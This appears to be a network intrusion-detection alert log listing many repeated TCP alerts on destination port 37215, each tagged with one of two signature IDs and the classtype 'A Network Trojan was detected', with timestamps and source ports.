                  Timestamp:07/10/24-08:27:28.064237
                  SID:2835222
                  Source Port:39202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817942
                  SID:2829579
                  Source Port:53940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.618688
                  SID:2829579
                  Source Port:55142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.560548
                  SID:2829579
                  Source Port:49116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146612
                  SID:2835222
                  Source Port:57732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.441344
                  SID:2829579
                  Source Port:33552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383866
                  SID:2829579
                  Source Port:51862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.632458
                  SID:2835222
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.598533
                  SID:2835222
                  Source Port:56034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.035645
                  SID:2835222
                  Source Port:34388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2835222
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.636045
                  SID:2835222
                  Source Port:43296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.447819
                  SID:2835222
                  Source Port:44740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161125
                  SID:2835222
                  Source Port:45084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.893139
                  SID:2829579
                  Source Port:39698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525977
                  SID:2829579
                  Source Port:36016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641366
                  SID:2835222
                  Source Port:51478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.474550
                  SID:2829579
                  Source Port:49278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2829579
                  Source Port:51870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.668166
                  SID:2829579
                  Source Port:51062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535684
                  SID:2829579
                  Source Port:53746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.597937
                  SID:2835222
                  Source Port:55388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.198256
                  SID:2835222
                  Source Port:59152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122406
                  SID:2829579
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.778030
                  SID:2835222
                  Source Port:57034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.873072
                  SID:2829579
                  Source Port:52186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.020001
                  SID:2835222
                  Source Port:55226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667418
                  SID:2835222
                  Source Port:40532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.836233
                  SID:2835222
                  Source Port:53396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.646163
                  SID:2835222
                  Source Port:60290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.174408
                  SID:2835222
                  Source Port:42644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.042445
                  SID:2835222
                  Source Port:50474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.040110
                  SID:2835222
                  Source Port:33616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440414
                  SID:2829579
                  Source Port:36616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.820799
                  SID:2835222
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.882807
                  SID:2829579
                  Source Port:32800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.841938
                  SID:2829579
                  Source Port:38594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.621778
                  SID:2829579
                  Source Port:55246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.439991
                  SID:2835222
                  Source Port:51068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.874012
                  SID:2829579
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.576530
                  SID:2835222
                  Source Port:53044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.360438
                  SID:2829579
                  Source Port:35930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2835222
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872861
                  SID:2829579
                  Source Port:34798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849080
                  SID:2829579
                  Source Port:33820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122842
                  SID:2835222
                  Source Port:52890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.648560
                  SID:2835222
                  Source Port:48608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.867359
                  SID:2835222
                  Source Port:44200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794005
                  SID:2835222
                  Source Port:34856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2829579
                  Source Port:52568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288558
                  SID:2835222
                  Source Port:36414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.996765
                  SID:2829579
                  Source Port:46938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589238
                  SID:2829579
                  Source Port:46268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639022
                  SID:2835222
                  Source Port:52568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129960
                  SID:2829579
                  Source Port:54044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.368823
                  SID:2829579
                  Source Port:47030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829677
                  SID:2829579
                  Source Port:35360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.783788
                  SID:2829579
                  Source Port:58320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865935
                  SID:2835222
                  Source Port:57056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2835222
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805293
                  SID:2835222
                  Source Port:50862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.064217
                  SID:2829579
                  Source Port:38780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.140242
                  SID:2835222
                  Source Port:43850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.844415
                  SID:2835222
                  Source Port:52456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.066193
                  SID:2829579
                  Source Port:33424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.873299
                  SID:2829579
                  Source Port:43162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847892
                  SID:2829579
                  Source Port:58948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.565253
                  SID:2829579
                  Source Port:49072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2835222
                  Source Port:47404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448352
                  SID:2829579
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988917
                  SID:2835222
                  Source Port:34766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813781
                  SID:2835222
                  Source Port:51958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.473922
                  SID:2829579
                  Source Port:34694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.866007
                  SID:2835222
                  Source Port:52520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939725
                  SID:2835222
                  Source Port:59366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.988744
                  SID:2835222
                  Source Port:58686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.926715
                  SID:2835222
                  Source Port:34732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647233
                  SID:2829579
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588722
                  SID:2835222
                  Source Port:44220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828801
                  SID:2829579
                  Source Port:41168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.349242
                  SID:2835222
                  Source Port:44440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.452806
                  SID:2829579
                  Source Port:42272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.426359
                  SID:2835222
                  Source Port:45462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921698
                  SID:2835222
                  Source Port:58804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879570
                  SID:2835222
                  Source Port:50672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2829579
                  Source Port:35424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.048424
                  SID:2835222
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.030907
                  SID:2829579
                  Source Port:52406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.441916
                  SID:2835222
                  Source Port:54822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.299447
                  SID:2829579
                  Source Port:50734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2829579
                  Source Port:56966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.817935
                  SID:2835222
                  Source Port:49910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082324
                  SID:2829579
                  Source Port:45850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.188794
                  SID:2829579
                  Source Port:57726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854802
                  SID:2835222
                  Source Port:35264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.230635
                  SID:2835222
                  Source Port:37826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962795
                  SID:2835222
                  Source Port:52968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187450
                  SID:2835222
                  Source Port:52466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.501103
                  SID:2835222
                  Source Port:35032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626210
                  SID:2835222
                  Source Port:40342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.827269
                  SID:2835222
                  Source Port:38712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2829579
                  Source Port:51394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.618232
                  SID:2835222
                  Source Port:37024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.875517
                  SID:2829579
                  Source Port:49740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.890677
                  SID:2835222
                  Source Port:36956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.912875
                  SID:2829579
                  Source Port:42216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.560985
                  SID:2829579
                  Source Port:36218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2835222
                  Source Port:43634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.529678
                  SID:2835222
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.768994
                  SID:2829579
                  Source Port:55992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109463
                  SID:2829579
                  Source Port:41110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.353904
                  SID:2835222
                  Source Port:49906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.904086
                  SID:2829579
                  Source Port:35922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.961699
                  SID:2835222
                  Source Port:51860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867172
                  SID:2829579
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.930927
                  SID:2835222
                  Source Port:49062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877678
                  SID:2835222
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.657755
                  SID:2835222
                  Source Port:36666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772841
                  SID:2829579
                  Source Port:41712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239596
                  SID:2835222
                  Source Port:37716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2829579
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425989
                  SID:2829579
                  Source Port:54966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.553055
                  SID:2829579
                  Source Port:43916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554172
                  SID:2835222
                  Source Port:45122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.824127
                  SID:2829579
                  Source Port:53578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2829579
                  Source Port:59958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.334261
                  SID:2835222
                  Source Port:38060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831289
                  SID:2829579
                  Source Port:39500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.570253
                  SID:2835222
                  Source Port:43058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.878785
                  SID:2829579
                  Source Port:56054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.097626
                  SID:2829579
                  Source Port:47388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555848
                  SID:2829579
                  Source Port:48294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.080592
                  SID:2829579
                  Source Port:58748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.774458
                  SID:2829579
                  Source Port:36786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:56120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376838
                  SID:2835222
                  Source Port:49270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.520394
                  SID:2835222
                  Source Port:35220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171855
                  SID:2829579
                  Source Port:43104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857125
                  SID:2835222
                  Source Port:47692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549975
                  SID:2829579
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.804743
                  SID:2835222
                  Source Port:40678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.223907
                  SID:2829579
                  Source Port:59804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.533067
                  SID:2829579
                  Source Port:38150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912648
                  SID:2829579
                  Source Port:50262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.876848
                  SID:2835222
                  Source Port:43184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:36764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2835222
                  Source Port:53116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.128256
                  SID:2835222
                  Source Port:42684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.945424
                  SID:2829579
                  Source Port:60612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.886738
                  SID:2835222
                  Source Port:43802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.455188
                  SID:2835222
                  Source Port:39522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827903
                  SID:2835222
                  Source Port:52560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.222865
                  SID:2829579
                  Source Port:38458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.718757
                  SID:2835222
                  Source Port:46378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019477
                  SID:2829579
                  Source Port:42346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.511212
                  SID:2829579
                  Source Port:39596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.938884
                  SID:2829579
                  Source Port:34144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516492
                  SID:2829579
                  Source Port:37474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.562596
                  SID:2835222
                  Source Port:53596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.873718
                  SID:2835222
                  Source Port:42870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2835222
                  Source Port:45074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967013
                  SID:2835222
                  Source Port:37362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2835222
                  Source Port:33026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.023936
                  SID:2829579
                  Source Port:40548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772069
                  SID:2829579
                  Source Port:46394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.472197
                  SID:2829579
                  Source Port:42550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2829579
                  Source Port:54526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734859
                  SID:2829579
                  Source Port:53846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2835222
                  Source Port:57798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.990301
                  SID:2835222
                  Source Port:51610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.812412
                  SID:2829579
                  Source Port:43294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.196013
                  SID:2829579
                  Source Port:51272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.180230
                  SID:2829579
                  Source Port:43806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647317
                  SID:2829579
                  Source Port:52356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.954167
                  SID:2829579
                  Source Port:36000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.134892
                  SID:2829579
                  Source Port:53320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881781
                  SID:2829579
                  Source Port:49452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448205
                  SID:2835222
                  Source Port:39936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.721155
                  SID:2835222
                  Source Port:45180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.603168
                  SID:2835222
                  Source Port:44928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176118
                  SID:2835222
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.259501
                  SID:2829579
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.755859
                  SID:2829579
                  Source Port:46144
                  Destination Port:37215
                  Protocol:TCP
